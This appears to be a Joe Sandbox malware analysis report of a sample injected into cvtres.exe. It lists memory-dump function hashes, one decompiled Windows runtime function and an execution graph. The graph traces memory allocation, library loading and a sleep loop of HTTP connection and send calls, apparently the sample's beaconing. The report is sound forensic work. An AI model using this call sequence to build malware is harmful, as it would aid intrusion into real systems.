                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2c0dcb34598e49c8c8f25f5562e3787dbe00bccb8046ad0a9e5a91633f124690
                                                                        • Instruction ID: b7878658af388b83929b718b625f43c9f015fa86c111ed271607bd8af33757e7
                                                                        • Opcode Fuzzy Hash: 2c0dcb34598e49c8c8f25f5562e3787dbe00bccb8046ad0a9e5a91633f124690
                                                                        • Instruction Fuzzy Hash: B490027524504442D50065595844A870065A7D0349F92D411A141459CD8A948861B261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9770 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c823eea97fc9c33972ec563609fcceb076353f67980304d238bbe23f09b9e79a
                                                                        • Instruction ID: c418bb958b9e65d3c4b791c4ba11d8f50ae83f8ed17ded4e937d66d313a7a48c
                                                                        • Opcode Fuzzy Hash: c823eea97fc9c33972ec563609fcceb076353f67980304d238bbe23f09b9e79a
                                                                        • Instruction Fuzzy Hash: 9A90026124504442D10065595448A060065A7D0249F92D011A2054595DCA758851B271
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9760 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da052fcc56913fe17d4bcbe387cf7b20ccf3f82244d43b427c79a2869c405f01
                                                                        • Instruction ID: 0f42e23f0b0bd80c4a9013439c99a7dea7784c8be24d01827929891018392892
                                                                        • Opcode Fuzzy Hash: da052fcc56913fe17d4bcbe387cf7b20ccf3f82244d43b427c79a2869c405f01
                                                                        • Instruction Fuzzy Hash: D290027124100403D100615955487070065A7D0245F92D411A1414558DDA9688517261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055EA710 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 976f1f076c424155ea0fae401ff8f9522e345624157bfa142f5f8c42f156bd57
                                                                        • Instruction ID: 38b1c4b8696c7b7e9cdca9d51388d7ef7a424ea19f591e0b0ee598f9108d54c0
                                                                        • Opcode Fuzzy Hash: 976f1f076c424155ea0fae401ff8f9522e345624157bfa142f5f8c42f156bd57
                                                                        • Instruction Fuzzy Hash: 67900271341000529500A6995844A4A4165A7F0345B92D015A5004554C899488617261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9730 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a2eacedcb2e1b6d1c89442398c60e3e9e803ef4dc43620e832e5fdc2cd9e91dc
                                                                        • Instruction ID: addcad1217df3f6748e626767e0292fe1154a87fd1b7f886325943c590ea2b60
                                                                        • Opcode Fuzzy Hash: a2eacedcb2e1b6d1c89442398c60e3e9e803ef4dc43620e832e5fdc2cd9e91dc
                                                                        • Instruction Fuzzy Hash: 5F90026164500402D140715954587060075A7D0245F92D011A1014554DCA998A5577E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9650 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18f42c9bbcbde457f929586062dd4a5643904c3a842ac23a6ce3e1d20626ff1e
                                                                        • Instruction ID: 9d97f6b681f389b39b98be6dea7474cdbd92b999450e307a94d4ea9c9d0fb7a5
                                                                        • Opcode Fuzzy Hash: 18f42c9bbcbde457f929586062dd4a5643904c3a842ac23a6ce3e1d20626ff1e
                                                                        • Instruction Fuzzy Hash: FE90027124504842D14071594444A460075A7D0349F92C011A1054694D9A658D55B7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9610 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa1376e8f947aa3b63a93a51ba0a62571bbe779e7ad5752b801bd747a6dd5836
                                                                        • Instruction ID: b3de8647ca0771c1c437f0a156a6634c5526caceb3a00c6a194c7fd3a520a276
                                                                        • Opcode Fuzzy Hash: aa1376e8f947aa3b63a93a51ba0a62571bbe779e7ad5752b801bd747a6dd5836
                                                                        • Instruction Fuzzy Hash: C890027164500802D150715944547460065A7D0345F92C011A1014654D8B958A5577E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E96D0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b733c8786c55e277a5a460ec38c42283273e8c27bae56e86fcac1ee6124812a7
                                                                        • Instruction ID: e23c4e01924652c11d0650fcf76725cd43167273efa54d4592a6100b1b503bde
                                                                        • Opcode Fuzzy Hash: b733c8786c55e277a5a460ec38c42283273e8c27bae56e86fcac1ee6124812a7
                                                                        • Instruction Fuzzy Hash: 0590027124100842D10061594444B460065A7E0345F92C016A1114654D8A55C8517661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9950 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 533c53c7de344247659bc826deb2b108745a0f84f59fbb1f16e6426e912bdd59
                                                                        • Instruction ID: 096372c93f9763ed9748f585b0d0e65c11404807ff9de4e662ea2967eb19551c
                                                                        • Opcode Fuzzy Hash: 533c53c7de344247659bc826deb2b108745a0f84f59fbb1f16e6426e912bdd59
                                                                        • Instruction Fuzzy Hash: 999002A124140403D140655948446070065A7D0346F92C011A3054555E8E698C517275
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E99D0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aa64a292fd52bbac6b1df42490c28fc2e6418b54fd8b5b7440fb10fb03867bca
                                                                        • Instruction ID: 5b678ad66c54c8eb8dc8c5accada87127d1f5ffe35f555403c1d92f468a8ba86
                                                                        • Opcode Fuzzy Hash: aa64a292fd52bbac6b1df42490c28fc2e6418b54fd8b5b7440fb10fb03867bca
                                                                        • Instruction Fuzzy Hash: D19002A125100042D1046159444470600A5A7E1245F92C012A3144554CC9698C617265
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055EB040 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a61f361547ea92c7ff4b489f287a148c16eb1922f3f81a4124ab7f17821b304
                                                                        • Instruction ID: ad4683879f73b13c1fcbe0fb682081de90ec0a665e4312fa919aae4030612dfb
                                                                        • Opcode Fuzzy Hash: 9a61f361547ea92c7ff4b489f287a148c16eb1922f3f81a4124ab7f17821b304
                                                                        • Instruction Fuzzy Hash: 879002A1641140434540B15948444065075B7E13453D2C121A1444560C8AA88855B3A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9820 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a16f51b3cf31e430c89a2dd29326373cb24c1d1875a5db6b0667d644846d4e9
                                                                        • Instruction ID: 5960d832b8a63b23933bbe235939761a4dc27713e668acdda0c3fe6d386ae6fd
                                                                        • Opcode Fuzzy Hash: 6a16f51b3cf31e430c89a2dd29326373cb24c1d1875a5db6b0667d644846d4e9
                                                                        • Instruction Fuzzy Hash: 5190027128100402D141715944446060069B7D0285FD2C012A1414554E8A958A56BBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E98A0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 51e69d3e2569dd24681fce40c2e0f6c2ad8537dac0f62f16afcfe23dc5a2c43b
                                                                        • Instruction ID: 498140a56513dbcf970494cf9e90ea0e2acbe64f6544e3fb27a105a8992bba2d
                                                                        • Opcode Fuzzy Hash: 51e69d3e2569dd24681fce40c2e0f6c2ad8537dac0f62f16afcfe23dc5a2c43b
                                                                        • Instruction Fuzzy Hash: 9190026134100402D102615944546060069E7D1389FD2C012E2414555D8A658953B272
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9B00 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 01a62eb5a6add70de1ab6740299c20dc4e7dfbd7a62ed2f102fd00be7ee13a6d
                                                                        • Instruction ID: 8acf309af5f8e2dfd7598d85a6efa556e85060647528e11f750a0daf7b953d7a
                                                                        • Opcode Fuzzy Hash: 01a62eb5a6add70de1ab6740299c20dc4e7dfbd7a62ed2f102fd00be7ee13a6d
                                                                        • Instruction Fuzzy Hash: 5C90026128100802D140715984547070066E7D0645F92C011A1014554D8A56896577F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055EA3B0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e59f648059cdafdb4f0d4207cb12b13e47f1e4234b8d2489438f12957d33723d
                                                                        • Instruction ID: 32f5dd8caa1554c5461b84bbad2ae86c045cb151e05baf52a2de6758e4e57568
                                                                        • Opcode Fuzzy Hash: e59f648059cdafdb4f0d4207cb12b13e47f1e4234b8d2489438f12957d33723d
                                                                        • Instruction Fuzzy Hash: 2290027124144002D1407159848460B5065B7E0345F92C411E1415554C8A558856B361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9A10 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b411ce032ecc4594754b8220f7a82b1e9d2557776a6b067a8826c987baded592
                                                                        • Instruction ID: 56a2f3acec0fa91e62d18a6e48288b6a7091e9ee064d46885e6b93dab095e097
                                                                        • Opcode Fuzzy Hash: b411ce032ecc4594754b8220f7a82b1e9d2557776a6b067a8826c987baded592
                                                                        • Instruction Fuzzy Hash: 3690027124140402D100615948487470065A7D0346F92C011A6154555E8AA5C8917671
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9A80 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ce94b1bfb69b40a8a1c6d3ff61276ec4f2708456b52de8dc1b8594248f2b85d0
                                                                        • Instruction ID: 3a599a9e7ecb22723d9d6e4e33e016f89103ac9475c05570ff8bd10c2465e6c8
                                                                        • Opcode Fuzzy Hash: ce94b1bfb69b40a8a1c6d3ff61276ec4f2708456b52de8dc1b8594248f2b85d0
                                                                        • Instruction Fuzzy Hash: AF90026124144442D14062594844B0F4165A7E1246FD2C019A5146554CCD5588557761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 917fe34af03de0dd7b34be418a6ae9c09190920c953e48767721e265591997d7
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0563FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E0563FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E055ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05635720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05635720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x0563fdda
                                                                        0x0563fde2
                                                                        0x0563fde5
                                                                        0x0563fdec
                                                                        0x0563fdfa
                                                                        0x0563fdff
                                                                        0x0563fe0a
                                                                        0x0563fe0f
                                                                        0x0563fe17
                                                                        0x0563fe1e
                                                                        0x0563fe19
                                                                        0x0563fe19
                                                                        0x0563fe19
                                                                        0x0563fe20
                                                                        0x0563fe21
                                                                        0x0563fe22
                                                                        0x0563fe25
                                                                        0x0563fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0563FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0563FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0563FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 434d08d4027162844a01888df13aa5b967be3b7a61df3d0be1a40629cb25b8ef
                                                                        • Instruction ID: eecbe2b15e098b6bdf128a279734a6ffdee10ba5774ecbf1999b1e335ffc448f
                                                                        • Opcode Fuzzy Hash: 434d08d4027162844a01888df13aa5b967be3b7a61df3d0be1a40629cb25b8ef
                                                                        • Instruction Fuzzy Hash: 83F0F036640201BFEB241A45DC07F23BF6BEB84730F240318F628565E1EA62F820D6F4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:5%
                                                                        Dynamic/Decrypted Code Coverage:1.9%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:740
                                                                        Total number of Limit Nodes:95
                                                                        execution_graph 32727 4839540 LdrInitializeThunk 32730 8772f0 32733 87732b 32730->32733 32741 87a010 32730->32741 32732 87740c 32733->32732 32744 869b30 32733->32744 32737 877390 Sleep 32738 87737d 32737->32738 32738->32732 32738->32737 32753 876f20 32738->32753 32775 877120 LdrLoadDll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA 32738->32775 32776 8787b0 32741->32776 32743 87a03d 32743->32733 32745 869b54 32744->32745 32746 869b5b 32745->32746 32747 869b90 LdrLoadDll 32745->32747 32748 873e40 32746->32748 32747->32746 32749 873e4e 32748->32749 32750 873e5a 32748->32750 32749->32750 32783 8742c0 LdrLoadDll 32749->32783 32750->32738 32752 873fac 32752->32738 32754 876f45 32753->32754 32755 876f9f 32754->32755 32784 878bf0 32754->32784 32771 8770f3 32755->32771 32789 878c60 32755->32789 32758 876fe0 32758->32771 32794 878ce0 32758->32794 32760 87700d 32761 877027 32760->32761 32762 877016 32760->32762 32799 878d60 32761->32799 32804 878e40 LdrLoadDll 32762->32804 32765 87701d 32765->32738 32766 8770d9 32807 878e40 LdrLoadDll 32766->32807 32768 8770ec 32808 878e40 LdrLoadDll 32768->32808 32769 877036 32769->32766 32805 878dd0 LdrLoadDll 32769->32805 32771->32738 32773 8770a8 32773->32766 32806 878dd0 LdrLoadDll 32773->32806 32775->32738 32777 8787cc NtAllocateVirtualMemory 32776->32777 32779 8791d0 32776->32779 32777->32743 32780 8791e0 32779->32780 32782 879202 32779->32782 32781 873e40 LdrLoadDll 32780->32781 32781->32782 32782->32777 32783->32752 32809 879280 32784->32809 32787 878c33 InternetOpenA 32787->32755 32788 878c4e 32788->32755 32790 878c9f 32789->32790 32791 879280 LdrLoadDll 32789->32791 32792 878ccf 32790->32792 32793 878ca8 InternetConnectA 32790->32793 32791->32790 32792->32758 32793->32758 32795 879280 LdrLoadDll 32794->32795 32796 878d1f 32795->32796 32797 878d4f 32796->32797 32798 878d28 HttpOpenRequestA 32796->32798 32797->32760 32798->32760 32800 878d9f 32799->32800 32801 879280 LdrLoadDll 32799->32801 32802 878dc3 32800->32802 32803 878da8 HttpSendRequestA 32800->32803 32801->32800 32802->32769 32803->32769 32804->32765 32805->32773 32806->32773 32807->32768 32808->32771 32810 878c2a 32809->32810 32811 87928c 32809->32811 32810->32787 32810->32788 32812 873e40 LdrLoadDll 32811->32812 32812->32810 32813 87d49d 32816 879c70 32813->32816 32817 879c96 32816->32817 32824 868b50 32817->32824 32819 879ca2 32820 879cc6 32819->32820 32832 867e40 32819->32832 32864 878920 32820->32864 32867 868aa0 32824->32867 32826 868b5d 32827 868b64 32826->32827 32879 868a40 32826->32879 32827->32819 32833 867e67 32832->32833 33279 86a000 32833->33279 32835 867e79 33283 869d50 32835->33283 32837 867e96 32845 867e9d 32837->32845 33334 869c80 LdrLoadDll 32837->33334 32840 867f06 32841 87a260 2 API calls 32840->32841 32861 867fe4 32840->32861 32842 867f1c 32841->32842 32843 87a260 2 API calls 32842->32843 32844 867f2d 32843->32844 32846 87a260 2 API calls 32844->32846 32845->32861 33287 86d160 32845->33287 32847 867f3e 32846->32847 33299 86aec0 32847->33299 32849 867f51 32850 873a40 8 API calls 32849->32850 32851 867f62 32850->32851 32852 873a40 8 API calls 32851->32852 32853 867f73 32852->32853 32854 867f93 32853->32854 33311 86ba30 32853->33311 32856 873a40 8 API calls 32854->32856 32859 867fdb 32854->32859 32862 867faa 32856->32862 33317 867c70 32859->33317 32861->32820 32862->32859 33336 86bad0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32862->33336 32865 87893f 32864->32865 32866 8791d0 LdrLoadDll 32864->32866 32866->32865 32898 876e40 32867->32898 32871 868ac6 32871->32826 32872 868abc 32872->32871 32905 879520 32872->32905 32874 868b03 32874->32871 32916 8688c0 32874->32916 32876 868b23 32922 868320 LdrLoadDll 32876->32922 32878 868b35 32878->32826 32880 868a5a 32879->32880 32881 879810 LdrLoadDll 32879->32881 33258 879810 32880->33258 32881->32880 32884 879810 LdrLoadDll 32885 868a81 32884->32885 32886 86cf60 32885->32886 32887 86cf79 32886->32887 33262 869e80 32887->33262 32889 86cf8c 33266 878450 32889->33266 32893 86cfb2 32894 86cfdd 32893->32894 33272 8784d0 32893->33272 32896 878700 2 API calls 32894->32896 32897 868b75 32896->32897 32897->32819 32899 876e4f 32898->32899 32900 873e40 LdrLoadDll 32899->32900 32901 868ab3 32900->32901 32902 876cf0 32901->32902 32923 878870 32902->32923 32906 879539 32905->32906 32926 873a40 32906->32926 32908 879551 32909 87955a 32908->32909 32965 879360 32908->32965 32909->32874 32911 87956e 32911->32909 32983 878170 32911->32983 32919 8688da 32916->32919 33236 866e20 32916->33236 32918 8688e1 32918->32876 32919->32918 33249 8670e0 32919->33249 32922->32878 32924 876d05 32923->32924 32925 8791d0 LdrLoadDll 32923->32925 32924->32872 32925->32924 32927 873d75 32926->32927 32928 873a54 32926->32928 32927->32908 32928->32927 32991 877ec0 32928->32991 32931 873b63 33052 8786d0 LdrLoadDll 32931->33052 32932 873b80 32995 8785d0 32932->32995 32935 873ba7 32937 87a090 2 API calls 32935->32937 32936 873b6d 32936->32908 32938 873bb3 32937->32938 32938->32936 32939 873d39 32938->32939 32940 873d4f 32938->32940 32945 873c42 32938->32945 32941 878700 2 API calls 32939->32941 33061 873780 LdrLoadDll NtReadFile NtClose 32940->33061 32942 873d40 32941->32942 32942->32908 32944 873d62 32944->32908 32946 873ca9 32945->32946 32948 873c51 32945->32948 32946->32939 32947 873cbc 32946->32947 33054 878550 32947->33054 32950 873c56 32948->32950 32951 873c6a 32948->32951 33053 873640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32950->33053 32954 873c87 32951->32954 32955 873c6f 32951->32955 32954->32942 33010 873400 32954->33010 32998 8736e0 32955->32998 32957 873c60 32957->32908 32959 873d1c 33058 878700 32959->33058 32960 873c7d 32960->32908 32962 873c9f 32962->32908 32964 873d28 32964->32908 32966 879371 32965->32966 32967 879383 32966->32967 32968 87a010 2 API calls 32966->32968 32967->32911 32969 8793a4 32968->32969 33081 873050 32969->33081 32971 8793f0 32971->32911 32972 8793c7 32972->32971 32973 873050 3 API calls 32972->32973 32974 8793e9 32973->32974 32974->32971 33113 874380 32974->33113 32976 87947a 32977 87948a 32976->32977 33207 879170 LdrLoadDll 32976->33207 33123 878fe0 32977->33123 32980 8794b8 33202 878130 32980->33202 32984 8791d0 LdrLoadDll 32983->32984 32985 87818c 32984->32985 33230 483967a 32985->33230 32986 8781a7 32988 87a090 32986->32988 33233 8788e0 32988->33233 32990 8795c9 32990->32874 32992 877eca 32991->32992 32993 8791d0 LdrLoadDll 32992->32993 32994 873b34 32993->32994 32994->32931 32994->32932 32994->32936 32996 8785ec NtCreateFile 32995->32996 32997 8791d0 LdrLoadDll 32995->32997 32996->32935 32997->32996 32999 8736fc 32998->32999 33000 878550 LdrLoadDll 32999->33000 33001 87371d 33000->33001 33002 873724 33001->33002 33003 873738 33001->33003 33004 878700 2 API calls 33002->33004 33005 878700 2 API calls 33003->33005 33006 87372d 33004->33006 33007 873741 33005->33007 33006->32960 33062 87a2a0 33007->33062 33009 87374c 33009->32960 33011 87344b 33010->33011 33013 87347e 33010->33013 33014 878550 LdrLoadDll 33011->33014 33012 8735c9 33016 878550 LdrLoadDll 33012->33016 33013->33012 33018 87349a 33013->33018 33015 873466 33014->33015 33017 878700 2 API calls 33015->33017 33022 8735e4 33016->33022 33019 87346f 33017->33019 33020 878550 LdrLoadDll 33018->33020 33019->32962 33021 8734b5 33020->33021 33024 8734d1 33021->33024 33025 8734bc 33021->33025 33080 878590 LdrLoadDll 33022->33080 33028 8734d6 33024->33028 33029 8734ec 33024->33029 33027 878700 2 API calls 33025->33027 33026 87361e 33030 878700 2 API calls 33026->33030 33031 8734c5 33027->33031 33032 878700 2 API calls 33028->33032 33037 8734f1 33029->33037 33068 87a260 33029->33068 33033 873629 33030->33033 33031->32962 33034 8734df 33032->33034 33033->32962 33034->32962 33045 873503 33037->33045 33071 878680 33037->33071 33038 873557 33039 87356e 33038->33039 33079 878510 LdrLoadDll 33038->33079 33041 873575 33039->33041 33042 87358a 33039->33042 33043 878700 2 API calls 33041->33043 33044 878700 2 API calls 33042->33044 33043->33045 33046 873593 33044->33046 33045->32962 33047 8735bf 33046->33047 33074 879e60 33046->33074 33047->32962 33049 8735aa 33050 87a090 2 API calls 33049->33050 33051 8735b3 33050->33051 33051->32962 33052->32936 33053->32957 33055 8791d0 LdrLoadDll 33054->33055 33056 873d04 33055->33056 33057 878590 LdrLoadDll 33056->33057 33057->32959 33059 8791d0 LdrLoadDll 33058->33059 33060 87871c NtClose 33059->33060 33060->32964 33061->32944 33065 8788a0 33062->33065 33064 87a2ba 33064->33009 33066 8791d0 LdrLoadDll 33065->33066 33067 